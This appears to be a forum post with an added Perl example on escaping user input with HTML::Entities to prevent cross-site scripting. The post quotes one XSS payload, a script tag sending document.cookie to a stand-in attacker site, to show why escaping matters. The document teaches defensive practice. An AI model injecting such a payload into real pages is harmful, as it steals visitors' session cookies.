This or something similar should be in any code that re-displays user-entered input. HTML::Entities can do a very good job with this.
While an unclosed <H1> may be inconvenient, this can be even worse:
<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?' +document.cookie
</script>
Take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft
for information on why this can be "very bad".
In short: never display uncooked user input in a web page unless you have a very good reason to.
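
A sketch of cooking input with HTML::Entities at the point of output, covering both element text and a quoted attribute value. This is an added example, not part of the original post; the `render_comment` helper and the sample submissions are constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use HTML::Entities qw(encode_entities);

# Constructed sample input: values a visitor might submit in a "name" and
# "comment" field. The second is the unclosed-tag case, the third is
# markup that would run in the reader's browser if echoed raw.
my @submissions = (
    { name => 'alice',             comment => 'Nice post & thanks!' },
    { name => q{Bob "Bo" O'Neil},  comment => '<H1>oops, never closed' },
    { name => 'carol',             comment => '<script>alert(1)</script>' },
);

# Hypothetical helper: build one comment block. Every user-supplied value
# goes through encode_entities() when it is written into HTML, so stored
# data stays raw and only the output is cooked.
sub render_comment {
    my ($name, $comment) = @_;

    # With a single argument, encode_entities() replaces <, >, &, " and '
    # (plus control and high-bit characters) and returns the encoded copy.
    my $safe_name    = encode_entities($name);
    my $safe_comment = encode_entities($comment);

    # The attribute value is always double-quoted; since " becomes &quot;
    # the submitted name cannot end the attribute early.
    return qq{<div class="comment" title="Posted by $safe_name">\n}
         . qq{  <b>$safe_name</b>: $safe_comment\n}
         . qq{</div>\n};
}

for my $s (@submissions) {
    my $html = render_comment($s->{name}, $s->{comment});

    # Sanity check: no tag from the submitted text survived as markup.
    die "raw markup leaked into output\n" if $html =~ /<(?:script|h1)\b/i;

    print $html;
}
```

Entity encoding covers HTML text and quoted attribute values only; input written into a URL, a JavaScript string or a style block needs the encoding for that context instead.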